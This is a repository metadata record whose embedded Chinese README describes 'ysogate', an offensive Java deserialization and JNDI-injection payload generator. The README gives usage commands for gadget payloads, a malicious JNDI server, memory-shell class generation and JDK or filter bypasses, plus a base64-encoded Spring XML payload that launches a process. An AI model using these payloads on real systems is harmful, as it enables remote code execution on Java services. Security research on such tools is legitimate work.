{"id":27211043,"url":"https://github.com/h4cking2thegate/ysogate","last_synced_at":"2025-08-19T01:08:04.883Z","repository":{"id":202801385,"uuid":"708080877","full_name":"H4cking2theGate/ysogate","owner":"H4cking2theGate","description":"Java反序列化/JNDI注入/恶意类生成工具，支持多种高版本bypass，支持回显/内存马等多种扩展利用。","archived":false,"fork":false,"pushed_at":"2025-08-06T09:03:35.000Z","size":278,"stargazers_count":112,"open_issues_count":0,"forks_count":11,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-08-06T11:16:43.222Z","etag":null,"topics":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/H4cking2theGate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-21T13:20:19.000Z","updated_at":"2025-08-06T09:03:39.000Z","dependencies_parsed_at":null,"dependency_job_id":"ea385061-d422-4f09-ad1d-952d7d7ade74","html_url":"https://github.com/H4cking2theGate/ysogate","commit_stats":null,"previous_names":["h4cking2thegate/ysogate"],"tags_count":9,"template":false,"template_full_name":null,"purl":"pkg:github/H4cking2theGate/ysogate","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/H4cking2theGate","download_url":"https://codeload.github.com/H4cking2theGate/ysogate/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271083699,"owners_count":24696350,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-18T02:00:08.743Z","response_time":89,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"created_at":"2025-04-10T01:28:15.399Z","updated_at":"2025-08-19T01:08:04.859Z","avatar_url":"https://github.com/H4cking2theGate.png","language":"Java","readme":"# ysogate\n\nysogate是一个java综合利用工具，支持JNDI注入相关利用，包含多种高版本jdk绕过方式，且支持片段化gadget生成和组合。\n\n- 生成多种Java反序列化gadget payload\n- 支持JNDI/LDAP/RMI/JRMP等多种利用方式\n- 灵活的命令行界面，支持多种操作模式\n- 可扩展的架构，便于添加新的gadget和攻击向量\n- 支持多种高版本jdk绕过方式\n- 支持扩展利用方式，如内存马，回显，代理等\n\n## Usage\n\n分为两种模式，指定`-m jndi`来启动 JNDI Server，指定`-m payload`来生成反序列化payload，指定`-m gen`来生成恶意类\n\n```bash\n[root]#~  H4cking to the Gate !\n[root]#~  Usage:\n[root]#~  Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~  JNDI    Mode: java -jar ysogate-[version]-all.jar -m jndi    [JNDI OPTIONS]\n[root]#~  Gen     Mode: java -jar ysogate-[version]-all.jar -m gen     [GEN OPTIONS]\n```\n## Payload Mode\n可以使用`-m payload`来使用payload模式，这个模式下会生成自定义的反序列化payload\n\n例如输出base64编码的payload\n\n```\njava -jar ysogate-[version]-all.jar -m payload -g Jackson1 -p calc -b64\n```\n使用`-ol`来输出 overlong UTF-8 encoding\n```\n-m payload -g Jackson1 -p calc -b64 -ol\n```\n新增SpringAOP利用链\n```\n# 加载字节码\n-m payload -g SpringAOPWithTemplates -p \"notepad\" -b64\n# 加载xml\n-m payload -g SpringAOPWithXml -p \"http://127.0.0.1:8000/666\" -b64\n# 写文件\n-m payload -g SpringAOPWithFileWrite -p \"/tmp/evil.xml;PGJlYW5zIHhtbG5zPSJodHRwOi8vd3d3LnNwcmluZ2ZyYW1ld29yay5vcmcvc2NoZW1hL2JlYW5zIiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4c2k6c2NoZW1hTG9jYXRpb249Imh0dHA6Ly93d3cuc3ByaW5nZnJhbWV3b3JrLm9yZy9zY2hlbWEvYmVhbnMgaHR0cDovL3d3dy5zcHJpbmdmcmFtZXdvcmsub3JnL3NjaGVtYS9iZWFucy9zcHJpbmctYmVhbnMueHNkIj4NCiAgPGJlYW4gaWQ9InBiIiBjbGFzcz0iamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIiBpbml0LW1ldGhvZD0ic3RhcnQiPg0KICAgIDxjb25zdHJ1Y3Rvci1hcmc+DQogICAgICA8bGlzdD4NCiAgICAgICAgPHZhbHVlPmNhbGM8L3ZhbHVlPg0KICAgICAgPC9saXN0Pg0KICAgIDwvY29uc3RydWN0b3ItYXJnPg0KICA8L2JlYW4+DQo8L2JlYW5zPg==\" -b64\n```\n\n更多用法参考 [PayloadMode](docs/PayloadMode.md)\n## JNDI Mode\n可以使用`-m jndi`来使用jndi模式，这个模式会在本地运行恶意的jndi服务器\n\n```\n[root]#~  JNDI Mode Options:\n -h,--help              Show help message\n -hp,--httpPort \u003carg\u003e   HTTP port\n -i,--ip \u003carg\u003e          IP address for JNDI server\n -ldap2rmi              change ldap to rmi to bypass trustSerialData\n -lp,--ldapPort \u003carg\u003e   LDAP port\n -m,--mode \u003carg\u003e        Operation mode: 'payload' or 'jndi' or 'gen'\n -onlyRef               use Reference only to bypass trustSerialData\n -rp,--rmiPort \u003carg\u003e    RMI port\n```\n\n例如\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\n更多用法参考 [JNDIMode](docs/JNDIMode.md)\n## Gen Mode\n可以使用`-m gen`来使用gen模式，用于生成恶意类\n\n```\n[root]#~  Gen Mode Options:\n -bypass                   ByPass JDK Module\n -f,--format \u003carg\u003e         Output format\n -h,--help                 Show help message\n -m,--mode \u003carg\u003e           Operation mode: 'payload' or 'jndi' or 'gen'\n -name,--classname \u003carg\u003e   Evil Class Name\n -s,--sink \u003carg\u003e           Evil sink template\n -t,--type \u003carg\u003e           Middleware type\n```\n\n示例，生成springmvc的命令执行回显，添加-bypass绕过jdk高版本限制，适用于jdk17\n\n```\njava -jar ysogate-[version]-all.jar -m gen -t springmvc -s CmdExec -name org.springframework.expression.Evil -bypass\n```\n更多用法参考 [GenMode](docs/GenMode.md)\n## Todo\n- [x] 基础的反序列化生成payload\n- [x] 增加JNDI/LDAP/RMI/JRMP等利用方式\n- [x] 绕过trustSerialData\n- [x] 完善第三方库的gadget\n- [x] 添加中间件回显\n- [x] 在加载字节码方面增加扩展攻击如回显，内存马，代理等\n- [ ] 补充RMI反序列化的利用\n- [x] 防护绕过方面的补充，增加OverlongUTF8/脏数据等绕过\n- [ ] 反序列化反弹shell优化\n- [ ] LDAPS协议支持\n\n\n\n## 免责声明\n本项目仅面向安全研究与学习，禁止任何非法用途\n\n如您在使用本项目的过程中存在任何非法行为，您需自行承担相应后果\n\n除非您已充分阅读、完全理解并接受本协议，否则，请您不要使用本项目\n\n\n\n## Reference\n\n - https://github.com/frohoff/ysoserial\n - https://github.com/X1r0z/JNDIMap\n - https://tttang.com/archive/1405/","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fh4cking2thegate%2Fysogate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fh4cking2thegate%2Fysogate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fh4cking2thegate%2Fysogate/lists"}